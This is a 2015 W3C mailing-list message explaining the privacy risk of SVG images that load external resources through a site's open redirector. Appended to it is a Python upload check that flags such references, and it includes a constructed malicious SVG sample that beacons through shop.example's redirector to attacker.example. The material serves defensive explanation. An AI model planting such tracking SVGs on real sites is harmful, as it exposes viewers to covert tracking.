
SVG image security restrictions

From: Robert O'Callahan <robert@ocallahan.org>
Date: Tue, 15 Sep 2015 11:49:36 +1200
Message-ID: <CAOp6jLZ2fPVJ_Y6SM4sPpKZ5o6C0fOmkX8CAtpFBaq7-SK6Svw@mail.gmail.com>
To: "public-fx@w3.org" <public-fx@w3.org>, www-style <www-style@w3.org>

I don't understand the minutes very well, but heycam says authors want SVG
images that can load external resources for sharing purposes, i.e., the
"animated mode" from here:
https://svgwg.org/specs/integration/#animated-mode

We don't support that mode currently because it can lead to surprising,
privacy-harming behavior for Web sites that allow third-party image uploads
and have open redirectors. Example:
1) Web site allows users to upload images of products for sale.
2) Web site also has some kind of open redirect functionality, i.e. some
(maybe totally unrelated) service that accepts URLs containing a URL for
another site, and causes a load to occur of the contained URL, often by
issuing an HTTP redirect to that URL. These are common.
3) Malicious user uploads an SVG image containing an external reference
with a URL for the open redirector, redirecting to the user's own site.
4) Now whenever someone views the malicious user's image, the malicious
user is notified, contrary to the privacy expectations of the site's users
and operators.

The more general problem is that there's an expectation that image files
are self-contained and cannot trigger loads. "Animated mode" SVG images
would violate that expectation.

We could try to address the open redirect scenario by restricting HTTP
redirects for loads performed by SVG images, but I'm not confident that
restricting HTTP redirects is even enough. For example, what if the Web
site has a service that loads arbitrary third party URLs in an IFRAME? Or
some kind of auto-image-upload service that takes a URL? Even if we somehow
gain confidence that we've blocked all avenues for exploitation, we'd have
made the Web platform even more complicated with additional failure modes.


Rob
-- 
lbir ye,ea yer.tnietoehr  rdn rdsme,anea lurpr  edna e hnysnenh hhe uresyf toD
selthor  stor  edna  siewaoeodm  or v sstvr  esBa  kbvted,t rdsme,aoreseoouoto
o l euetiuruewFa  kbn e hnystoivateweh uresyf tulsa rehr  rdm  or rnea lurpr
.a war hsrer holsa rodvted,t  nenh hneireseoouot.tniesiewaoeivatewt sstvr esn
Received on Monday, 14 September 2015 23:50:14 UTC
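The attack chain in the message above, seen from the side of a site operator who accepts third-party SVG uploads. This is an added example, not code from the original message or from any browser or W3C project: a server-side check that rejects uploaded SVGs carrying any reference that would trigger a network load when the image is rendered, next to the weaker "same-origin only" check that the message's open-redirector scenario defeats. The sample SVG, the hostnames shop.example and attacker.example, and the /redirect?url= endpoint are constructed for this example.

```python
"""Reject uploaded SVG images that reference external resources.

Added example, not part of the original message. Hostnames and the
/redirect?url= endpoint below are assumptions standing in for the
open redirector described in the message.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# NOTE: for real untrusted input parse with defusedxml instead of
# xml.etree to avoid entity-expansion and external-entity attacks.

XLINK_HREF = "{http://www.w3.org/1999/xlink}href"
URL_FUNC = re.compile(r"url\(\s*['\"]?([^'\")]+)['\"]?\s*\)", re.I)

# Presentation attributes that may carry a url(...) functional reference.
URL_ATTRS = ("fill", "stroke", "filter", "clip-path", "mask", "marker-start",
             "marker-mid", "marker-end", "cursor", "style")


def is_self_contained(ref: str) -> bool:
    """True only for references that never leave the document:
    a fragment such as #grad, or an inline data: URL."""
    ref = ref.strip()
    if ref.startswith("#"):
        return True
    return urlsplit(ref).scheme.lower() == "data"


def external_references(svg_text: str):
    """Return (tag, attribute, reference) for every reference that would
    cause a load when the SVG is rendered. Relative paths and
    protocol-relative URLs are flagged too: a relative path is exactly
    how an upload would reach the hosting site's own open redirector."""
    root = ET.fromstring(svg_text)
    found = []
    for el in root.iter():
        tag = el.tag.split("}")[-1]
        for attr in ("href", XLINK_HREF):
            if attr in el.attrib and not is_self_contained(el.attrib[attr]):
                found.append((tag, attr.split("}")[-1], el.attrib[attr].strip()))
        for attr in URL_ATTRS:
            for ref in URL_FUNC.findall(el.attrib.get(attr, "")):
                if not is_self_contained(ref):
                    found.append((tag, attr, ref.strip()))
        if tag == "style" and el.text:  # embedded stylesheets can load too
            for ref in URL_FUNC.findall(el.text):
                if not is_self_contained(ref):
                    found.append((tag, "text", ref.strip()))
    return found


def is_safe_upload(svg_text: str) -> bool:
    """The check that matches the 'images are self-contained' expectation."""
    return not external_references(svg_text)


def same_origin_only(svg_text: str, site_host: str) -> bool:
    """The check that is NOT enough: it accepts references that point back
    at the hosting site, which is where the open redirector lives."""
    return all(urlsplit(ref).hostname == site_host
               for _, _, ref in external_references(svg_text))


# Constructed sample: step 3 of the message, an upload whose <image>
# points at the site's own redirector, which bounces to the attacker.
MALICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
  <defs>
    <linearGradient id="grad"><stop offset="0" stop-color="red"/></linearGradient>
  </defs>
  <rect width="200" height="200" fill="url(#grad)"/>
  <image width="1" height="1"
         xlink:href="https://shop.example/redirect?url=https://attacker.example/seen"/>
</svg>"""

# Constructed sample: only fragment and data: references, loads nothing.
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <defs><filter id="f"><feGaussianBlur stdDeviation="1"/></filter></defs>
  <circle r="4" cx="5" cy="5" filter="url(#f)"/>
  <image width="1" height="1" href="data:image/gif;base64,R0lGODlhAQABAAAAACw="/>
</svg>"""

if __name__ == "__main__":
    for name, svg in (("malicious", MALICIOUS_SVG), ("benign", BENIGN_SVG)):
        print(name, "safe:", is_safe_upload(svg),
              "passes same-origin check:", same_origin_only(svg, "shop.example"),
              "external refs:", external_references(svg))
```

The malicious upload passes the same-origin check, because every reference it makes is to shop.example itself; only the self-contained rule catches it, which is the message's point that restricting by destination or by redirect is not a reliable fix. Note the check is an upload-time mitigation for a site operator; it does not change what a browser will do with an SVG that reaches it by another route.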
